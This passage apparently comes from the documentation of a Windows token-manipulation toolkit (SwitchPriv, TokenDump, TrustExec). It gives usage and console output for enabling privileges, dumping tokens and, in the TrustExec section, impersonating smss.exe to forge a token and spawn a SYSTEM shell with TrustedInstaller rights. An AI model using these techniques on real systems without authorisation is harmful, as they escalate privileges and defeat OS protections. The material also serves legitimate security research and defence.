SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Enabled
C:\dev>SwitchPriv.exe -r timezone
[>] Trying to remove SeTimeZonePrivilege.
[*] Target PID : 9788
[*] Process Name : cmd
[+] SeTimeZonePrivilege is removed successfully.
[*] Done.
C:\dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
To enable, disable or remove all available token privileges, specify all
as the value for --enable
, --disable
or --remove
option:
C:\dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\dev>SwitchPriv.exe -e all
[>] Trying to enable all token privileges.
[*] Target PID : 9788
[*] Process Name : cmd
[+] SeShutdownPrivilege is enabled successfully.
[+] SeUndockPrivilege is enabled successfully.
[+] SeIncreaseWorkingSetPrivilege is enabled successfully.
[+] SeTimeZonePrivilege is enabled successfully.
[*] Done.
C:\dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
To find process have a specific privilege, use --find
option as follows:
C:\dev>SwitchPriv.exe -f createtoken
[>] Searching processes have SeCreateTokenPrivilege.
[+] Got 5 process(es).
[*] csrss (PID : 800)
[*] smss (PID : 660)
[*] lsass (PID : 1088)
[*] Memory Compression (PID : 3600)
[*] csrss (PID : 868)
[*] Access is denied by following 2 process(es).
[*] System (PID : 4)
[*] Idle (PID : 0)
[*] Done.
C:\dev>SwitchPriv.exe -g -p 800
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 800
[*] Process Name : csrss
[+] Got 30 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeRelabelPrivilege Disabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
[*] Integrity Level : System Mandatory Level
[*] Done.
If you want to set integrity level, use --integrity
option as follows:
C:\dev>whoami /groups | findstr /i level
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
C:\dev>SwitchPriv.exe -i 1
[>] Trying to set integrity level.
|-> Target PID : 5144
|-> Process Name : cmd
[>] Trying to set LOW_MANDATORY_LEVEL.
[+] LOW_MANDATORY_LEVEL is set successfully.
C:\dev>whoami /groups | findstr /i level
Mandatory Label\Low Mandatory Level Label S-1-16-4096
TokenDump
This tool is a utility to inspect token information:
C:\Dev>.\TokenDump.exe -h
TokenDump - Tool to dump processs token information.
Usage: TokenDump.exe [Options]
-h, --help : Displays this help message.
-d, --debug : Flag to enable SeDebugPrivilege.
-e, --enum : Flag to enumerate brief information tokens for processes or handles.
-T, --thread : Flag to scan thead tokens. Use with -e option.
-H, --handle : Flag to scan token handles. Use with -e option.
-s, --scan : Flag to get verbose information for a specific process, thread or handle.
-a, --account : Specifies account name filter string. Use with -e flag.
-p, --pid : Specifies a target PID in decimal format. Use with -s flag.
-t, --tid : Specifies a target TID in decimal format. Use with -s flag and -p option.
-v, --value : Specifies a token handle value in hex format. Use with -s flag and -p option.
To enumerate token for all processes, just set -e
flag:
C:\Dev>.\TokenDump.exe -e
[>] Trying to enumerate process token.
PID Process Name Token User Integrity Restricted AppContainer
==== =========================== ============================ ========= ========== ============
3016 sihost.exe X64DEV\user Medium False False
860 fontdrvhost.exe Font Driver Host\UMFD-0 Low False True
428 msedgewebview2.exe X64DEV\user Low True False
--snip--
5612 Widgets.exe X64DEV\user Medium False False
2588 svchost.exe NT AUTHORITY\LOCAL SERVICE System False False
9052 RuntimeBroker.exe X64DEV\user Medium False False
[+] Got 157 token information.
[*] Found 7 account(s).
[*] X64DEV\user
[*] Font Driver Host\UMFD-0
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\LOCAL SERVICE
[*] Font Driver Host\UMFD-1
[*] NT AUTHORITY\NETWORK SERVICE
[*] Window Manager\DWM-1
[*] Done.
If you want to enable SeDebugPrivilege, set -d
flag as follows:
C:\Dev>.\TokenDump.exe -e -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.
PID Process Name Token User Integrity Restricted AppContainer
==== =========================== ============================ ========= ========== ============
3544 svchost.exe NT AUTHORITY\SYSTEM System False False
6944 WmiPrvSE.exe NT AUTHORITY\SYSTEM System False False
3188 SystemInformer.exe X64DEV\user Medium False False
7608 sppsvc.exe NT AUTHORITY\NETWORK SERVICE System False False
6948 SecurityHealthSystray.exe X64DEV\user Medium False False
7228 svchost.exe X64DEV\user Medium False False
--snip--
When set -H
flag with -e
flag, TokenDump tries to enumerate Token handles information:
C:\Dev>.\TokenDump.exe -e -H
[>] Trying to enumerate token handles.
[Token Handle(s) - svchost.exe (PID: 2808)]
Handle Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== =========== ========= ========== ============ ============= ===================
0x4AC X64DEV\user Medium False False Primary Anonymous
0x50C X64DEV\user Medium False False Primary Anonymous
0x510 X64DEV\user Medium False False Primary Anonymous
0x514 X64DEV\user Medium False False Primary Anonymous
--snip--
[Token Handle(s) - msedgewebview2.exe (PID: 9804)]
Handle Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== =========== ========= ========== ============ ============= ===================
0x7D4 X64DEV\user Low True False Impersonation Impersonation
0x7D8 X64DEV\user Low True False Primary Anonymous
0xBCC X64DEV\user Low True False Impersonation Impersonation
0xBDC X64DEV\user Low True False Primary Anonymous
0xCF8 X64DEV\user Low True False Impersonation Impersonation
0xD00 X64DEV\user Low True False Primary Anonymous
[+] Got 910 handle(s).
[*] Found 7 account(s).
[*] NT AUTHORITY\SYSTEM
[*] X64DEV\user
[*] NT AUTHORITY\LOCAL SERVICE
[*] Font Driver Host\UMFD-1
[*] Font Driver Host\UMFD-0
[*] NT AUTHORITY\NETWORK SERVICE
[*] Window Manager\DWM-1
[*] Done.
To enumerate impersonated thread token, set -T
flag as well as -e
flag as follows:
C:\Dev>.\TokenDump.exe -e -T
[>] Trying to enumerate thread tokens.
PID TID Process Name Token User Integrity Impersonation Level
==== ==== ================= =================== ========= ===================
6552 5668 TokenStealing.exe NT AUTHORITY\SYSTEM System Impersonation
[+] Got 1 handle(s).
[*] Found 1 account(s).
[*] NT AUTHORITY\SYSTEM
[*] Done.
If you want to filter these results with token username, set filter string as -a
option value as follows:
C:\Dev>.\TokenDump.exe -e -a network -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.
PID Process Name Token User Integrity Restricted AppContainer
==== ============ ============================ ========= ========== ============
3404 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
4656 msdtc.exe NT AUTHORITY\NETWORK SERVICE System False False
1628 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
2916 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
2464 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
4592 WmiPrvSE.exe NT AUTHORITY\NETWORK SERVICE System False False
7840 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
7408 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
940 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
[+] Got 9 token information.
[*] Found 7 account(s).
[*] X64DEV\user
[*] Font Driver Host\UMFD-0
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\LOCAL SERVICE
[*] Font Driver Host\UMFD-1
[*] NT AUTHORITY\NETWORK SERVICE
[*] Window Manager\DWM-1
[*] Done.
C:\Dev>.\TokenDump.exe -e -a network -H -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - lsass.exe (PID: 704)]
Handle Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ============================ ========= ========== ============ ============= ===================
0x8C4 NT AUTHORITY\NETWORK SERVICE System False False Impersonation Impersonation
--snip--
[Token Handle(s) - svchost.exe (PID: 7408)]
Handle Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ============================ ========= ========== ============ ========== ===================
0xB0 NT AUTHORITY\NETWORK SERVICE System False False Primary Anonymous
[+] Got 29 handle(s).
[*] Found 7 account(s).
[*] NT AUTHORITY\SYSTEM
[*] X64DEV\user
[*] Font Driver Host\UMFD-0
[*] Font Driver Host\UMFD-1
[*] NT AUTHORITY\NETWORK SERVICE
[*] Window Manager\DWM-1
[*] NT AUTHORITY\LOCAL SERVICE
[*] Done.
To get verbose information for a specific process, set -s
flag and target PID as -p
option value:
C:\Dev>.\TokenDump.exe -s -p 5520
[>] Trying to dump process token information.
[Token Information for ShellExperienceHost.exe (PID: 5520)]
ImageFilePath : C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
CommandLine : "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
Token User : X64DEV\user (SID: S-1-5-21-1272994938-2904448873-3522237253-1001)
Token Owner : X64DEV\user (SID: S-1-5-21-1272994938-2904448873-3522237253-1001)
Primary Group : X64DEV\None (SID: S-1-5-21-1272994938-2904448873-3522237253-513)
Token Type : Primary
Impersonation Level : Anonymous
Token ID : 0x00000000002FCAC9
Authentication ID : 0x000000000001E809
Original ID : 0x00000000000003E7
Modified ID : 0x00000000002FCAB9
Integrity Level : Low
Session ID : 1
Elevation Type : Limited
Elevated : False
Restricted : False
AppContainer : True
AppContainer Name : microsoft.windows.shellexperiencehost_cw5n1h2txyewy
AppContainer SID : S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708
AppContainer Number : 6
Has Linked Token : True
Token Source : User32
Token Source ID : 0x000000000001E500
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
GROUP INFORMATION
-----------------
Group Name Attributes
============================================================= =============================================
X64DEV\None Mandatory, EnabledByDefault, Enabled
Everyone Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Local account and member of Administrators group UseForDenyOnly
BUILTIN\Administrators UseForDenyOnly
BUILTIN\Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\INTERACTIVE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Authenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\This Organization Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Local account Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\LogonSessionId_0_124092 Mandatory, EnabledByDefault, Enabled, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\NTLM Authentication Mandatory, EnabledByDefault, Enabled
Mandatory Label\Low Mandatory Level Integrity, IntegrityEnabled
APPCONTAINER CAPABILITIES
-------------------------
Capability Name Flags
================================================================================ =======
NAMED CAPABILITIES\GlobalMediaControl Enabled
APPLICATION PACKAGE AUTHORITY\Software and hardware certificates or a smart card Enabled
NAMED CAPABILITIES\RemoteSystem Enabled
APPLICATION PACKAGE AUTHORITY\Your pictures library Enabled
NAMED CAPABILITIES\ActivitySystem Enabled
NAMED CAPABILITIES\BluetoothDeviceSettings Enabled
NAMED CAPABILITIES\PackageQuery Enabled
NAMED CAPABILITIES\CellularDeviceControl Enabled
NAMED CAPABILITIES\CellularDeviceIdentity Enabled
NAMED CAPABILITIES\NetworkDeviceSettings Enabled
NAMED CAPABILITIES\AppointmentsSystem Enabled
NAMED CAPABILITIES\EnterpriseCloudSSO Enabled
NAMED CAPABILITIES\ChatSystem Enabled
NAMED CAPABILITIES\ContactsSystem Enabled
NAMED CAPABILITIES\EmailSystem Enabled
NAMED CAPABILITIES\PhoneCallHistorySystem Enabled
NAMED CAPABILITIES\InputInjection Enabled
NAMED CAPABILITIES\UserDataAccountSetup Enabled
NAMED CAPABILITIES\UserWebAccounts Enabled
NAMED CAPABILITIES\ShellExperience Enabled
NAMED CAPABILITIES\CloudStore Enabled
NAMED CAPABILITIES\CortanaSettings Enabled
NAMED CAPABILITIES\PackageContents Enabled
NAMED CAPABILITIES\TargetedContent Enabled
NAMED CAPABILITIES\UserAccountInformation Enabled
APPLICATION PACKAGE AUTHORITY\Your Internet connection Enabled
NAMED CAPABILITIES\Location Enabled
NAMED CAPABILITIES\VisualElementsSystem Enabled
NAMED CAPABILITIES\ActivityData Enabled
NAMED CAPABILITIES\Bluetooth Enabled
NAMED CAPABILITIES\Radios Enabled
NAMED CAPABILITIES\WiFiControl Enabled
NAMED CAPABILITIES\CellularData Enabled
NAMED CAPABILITIES\WifiData Enabled
NAMED CAPABILITIES\BluetoothAdapter Enabled
NAMED CAPABILITIES\BluetoothSync Enabled
PACKAGE CAPABILITY\microsoft.windows.shellexperiencehost_cw5n1h2txyewy Enabled
NAMED CAPABILITIES\AccessoryManager Enabled
NAMED CAPABILITIES\AccessoryManager Enabled
NAMED CAPABILITIES\Contacts Enabled
NAMED CAPABILITIES\Email Enabled
NAMED CAPABILITIES\PhoneCallHistory Enabled
NAMED CAPABILITIES\UserAccountInformation Enabled
NAMED CAPABILITIES\ID_CAP_LOCATION Enabled
NAMED CAPABILITIES\Bluetooth Enabled
NAMED CAPABILITIES\Bluetooth Enabled
NAMED CAPABILITIES\Bluetooth Enabled
NAMED CAPABILITIES\Bluetooth Enabled
NAMED CAPABILITIES\Bluetooth Enabled
NAMED CAPABILITIES\Radios Enabled
NAMED CAPABILITIES\WiFiControl Enabled
DACL INFORMATION
----------------
Account Name Access Flags Type
=================================================== =========================== ===== =============
X64DEV\user GenericAll None AccessAllowed
NT AUTHORITY\SYSTEM GenericAll None AccessAllowed
NT AUTHORITY\LogonSessionId_0_124092 GenericExecute, GenericRead None AccessAllowed
microsoft.windows.shellexperiencehost_cw5n1h2txyewy GenericAll None AccessAllowed
[Linked Token Information for ShellExperienceHost.exe (PID: 5520)]
Token User : X64DEV\user (SID: S-1-5-21-1272994938-2904448873-3522237253-1001)
Token Owner : BUILTIN\Administrators (SID: S-1-5-32-544)
Primary Group : X64DEV\None (SID: S-1-5-21-1272994938-2904448873-3522237253-513)
Token Type : Impersonation
Impersonation Level : Identification
Token ID : 0x0000000000E9BC5F
Authentication ID : 0x000000000001E798
Original ID : 0x00000000000003E7
Modified ID : 0x000000000001E808
Integrity Level : High
Session ID : 1
Elevation Type : Full
Elevated : True
Restricted : False
AppContainer : False
Token Source : User32
Token Source ID : 0x000000000001E500
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeIncreaseQuotaPrivilege Disabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege Disabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege Disabled
SeIncreaseBasePriorityPrivilege Disabled
SeCreatePagefilePrivilege Disabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeRemoteShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
SeCreateSymbolicLinkPrivilege Disabled
SeDelegateSessionUserImpersonatePrivilege Disabled
GROUP INFORMATION
-----------------
Group Name Attributes
============================================================= =============================================
X64DEV\None Mandatory, EnabledByDefault, Enabled
Everyone Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Local account and member of Administrators group Mandatory, EnabledByDefault, Enabled
BUILTIN\Administrators Mandatory, EnabledByDefault, Enabled, Owner
BUILTIN\Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\INTERACTIVE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Authenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\This Organization Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Local account Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\LogonSessionId_0_124092 Mandatory, EnabledByDefault, Enabled, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\NTLM Authentication Mandatory, EnabledByDefault, Enabled
Mandatory Label\High Mandatory Level Integrity, IntegrityEnabled
DACL INFORMATION
----------------
Account Name Access Flags Type
==================================== =========================== ===== =============
BUILTIN\Administrators GenericAll None AccessAllowed
NT AUTHORITY\SYSTEM GenericAll None AccessAllowed
NT AUTHORITY\LogonSessionId_0_124092 GenericExecute, GenericRead None AccessAllowed
[*] Done.
If you set handle value in a specific process as -v
option and the PID as -p
option as well as -s
flag, this tool get verbose information for the handle as follows:
C:\Dev>.\TokenDump.exe -s -p 8828 -v 0x428 -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump token handle information.
[Token Information for Handle 0x428 of svchost.exe (PID: 8828)]
Token User : NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19)
Token Owner : NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19)
Primary Group : NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19)
Token Type : Impersonation
Impersonation Level : Impersonation
Token ID : 0x000000000119F79B
Authentication ID : 0x00000000000003E5
Original ID : 0x00000000000003E7
Modified ID : 0x000000000119F79D
Integrity Level : System
Session ID : 0
Elevation Type : Default
Elevated : True
Restricted : False
AppContainer : False
Has Linked Token : False
Token Source : Advapi
Token Source ID : 0x000000000006C1EC
PRIVILEGES INFORMATION
----------------------
Privilege Name State
======================= =========================
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeImpersonatePrivilege EnabledByDefault, Enabled
GROUP INFORMATION
-----------------
Group Name Attributes
====================================== ====================================================
Mandatory Label\System Mandatory Level Integrity, IntegrityEnabled
Everyone Mandatory, EnabledByDefault, Enabled
BUILTIN\Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\SERVICE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Authenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\This Organization Mandatory, EnabledByDefault, Enabled
NT SERVICE\LicenseManager EnabledByDefault, Enabled, Owner
NT AUTHORITY\LogonSessionId_0_442859 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
DACL INFORMATION
----------------
Account Name Access Flags Type
========================= =========== ===== =============
NT AUTHORITY\SYSTEM GenericAll None AccessAllowed
OWNER RIGHTS ReadControl None AccessAllowed
NT SERVICE\LicenseManager GenericAll None AccessAllowed
[*] Done.
To investigate impersonate token applied to thread, set the thread ID as -t
option as follows:
C:\Dev>.\TokenDump.exe -e -T -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate thread tokens.
PID TID Process Name Token User Integrity Impersonation Level
==== ==== ================= =================== ========= ===================
2052 6768 svchost.exe NT AUTHORITY\SYSTEM System Impersonation
3416 2068 svchost.exe NT AUTHORITY\SYSTEM System Impersonation
3416 4168 svchost.exe NT AUTHORITY\SYSTEM System Impersonation
2864 8696 TokenStealing.exe NT AUTHORITY\SYSTEM System Impersonation
4936 4848 TiWorker.exe NT AUTHORITY\SYSTEM System Impersonation
[+] Got 5 handle(s).
[*] Found 1 account(s).
[*] NT AUTHORITY\SYSTEM
[*] Done.
C:\Dev>.\TokenDump.exe -s -p 4936 -t 4848 -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump thread token information.
[Token Information for TiWorker.exe (PID: 4936, TID: 4848)]
Token User : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Token Owner : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Primary Group : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Token Type : Impersonation
Impersonation Level : Impersonation
Token ID : 0x00000000010C7342
Authentication ID : 0x00000000000003E7
Original ID : 0x00000000000003E7
Modified ID : 0x0000000000F9368D
Integrity Level : System
Session ID : 0
Elevation Type : Default
Elevated : True
Restricted : False
AppContainer : False
Has Linked Token : False
Token Source : N/A
Token Source ID : N/A
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Enabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Enabled
SeRestorePrivilege Enabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
GROUP INFORMATION
-----------------
Group Name Attributes
====================================== ====================================================
Mandatory Label\System Mandatory Level Integrity, IntegrityEnabled
Everyone Mandatory, EnabledByDefault, Enabled
BUILTIN\Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\SERVICE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Authenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\This Organization Mandatory, EnabledByDefault, Enabled
NT SERVICE\TrustedInstaller EnabledByDefault, Enabled, Owner
NT AUTHORITY\LogonSessionId_0_14288153 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
BUILTIN\Administrators EnabledByDefault, Enabled, Owner
DACL INFORMATION
----------------
Account Name Access Flags Type
=========================== =========== ===== =============
NT AUTHORITY\SYSTEM GenericAll None AccessAllowed
OWNER RIGHTS ReadControl None AccessAllowed
NT SERVICE\TrustedInstaller GenericAll None AccessAllowed
[*] Done.
TrustExec
This tool is to execute process as NT SERVICE\TrustedInstaller
group account.
Original PoC is Grzegorz Tworek's TrustedInstallerCmd2.c.
I ported it to C# and rebuilt it as a tool.
Most of operations require administrative privilege (SeDebugPrivilege
, SeImpersonatePrivilege
and High Mandatory Level):
C:\dev>TrustExec.exe
TrustExec - Tool to investigate TrustedInstaller capability.
Usage: TrustExec.exe [Options]
-h, --help : Displays this help message.
-m, --module : Specifies module name.
Available Modules:
+ exec - Run process as "NT SERVICE\TrustedInstaller".
+ sid - Add or remove virtual account's SID.
[*] To see help for each modules, specify "-m <Module> -h" as arguments.
exec Module
This module is to execute process as TrustedInstaller group account:
C:\dev>TrustExec.exe -m exec -h
TrustExec - Help for "exec" command.
Usage: TrustExec.exe -m exec [Options]
-h, --help : Displays this help message.
-s, --shell : Flag for interactive shell.
-f, --full : Flag to enable all available privileges.
-t, --technique : Specifies technique ID. Default ID is 0.
-c, --command : Specifies command to execute.
-d, --domain : Specifies domain name to add. Default value is "DefaultDomain".
-u, --username : Specifies username to add. Default value is "DefaultUser".
-i, --id : Specifies RID for virtual domain. Default value is "110".
-e, --extra : Specifies extra group SID(s) to add.
Available Technique IDs:
+ 0 - Leverages SeCreateTokenPrivilege. Uses only --shell flag, --full flag and --command option.
+ 1 - Leverages virtual logon. This technique creates virtual domain and account as a side effect.
For this module, 2 techniques are implemeted.
We can specfy technique with -t
option.
If you set 0
or don't set value for -t
option, TrustExec
will try to create TrustedInstaller
process with create token technique.
To get interactive shell, set -s
flag.
C:\dev>TrustExec.exe -m exec -s
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 3360
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.19043.1526]
(c) Microsoft Corporation. All rights reserved.
C:\dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
C:\dev>whoami /groups | findstr /i trusted
NT SERVICE\TrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
C:\dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeDebugPrivilege Debug programs Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
If you want to add extra group account to token for new process, use -e
option as follows:
C:\dev>TrustExec.exe -m exec -s -e S-1-5-20
[>] Parsing group SID(s).
[+] "NT AUTHORITY\NETWORK SERVICE" is added as an extra group.
|-> SID : S-1-5-20
|-> Type : SidTypeWellKnownGroup
[>] Trying to get SYSTEM.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 4392
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.22000.318]
(c) Microsoft Corporation. All rights reserved.
C:\dev>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================== ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label S-1-16-16384
NT SERVICE\TrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK SERVICE Well-known group S-1-5-20 Mandatory group, Enabled by default, Enabled group
To add multiple groups, specifies SIDs as comma separated value:
C:\dev>TrustExec.exe -m exec -s -e S-1-5-20,S-1-5-32-551
[>] Parsing group SID(s).
[+] "NT AUTHORITY\NETWORK SERVICE" is added as an extra group.
|-> SID : S-1-5-20
|-> Type : SidTypeWellKnownGroup
[+] "BUILTIN\Backup Operators" is added as an extra group.
|-> SID : S-1-5-32-551
|-> Type : SidTypeAlias
[>] Trying to get SYSTEM.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 3104
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.22000.318]
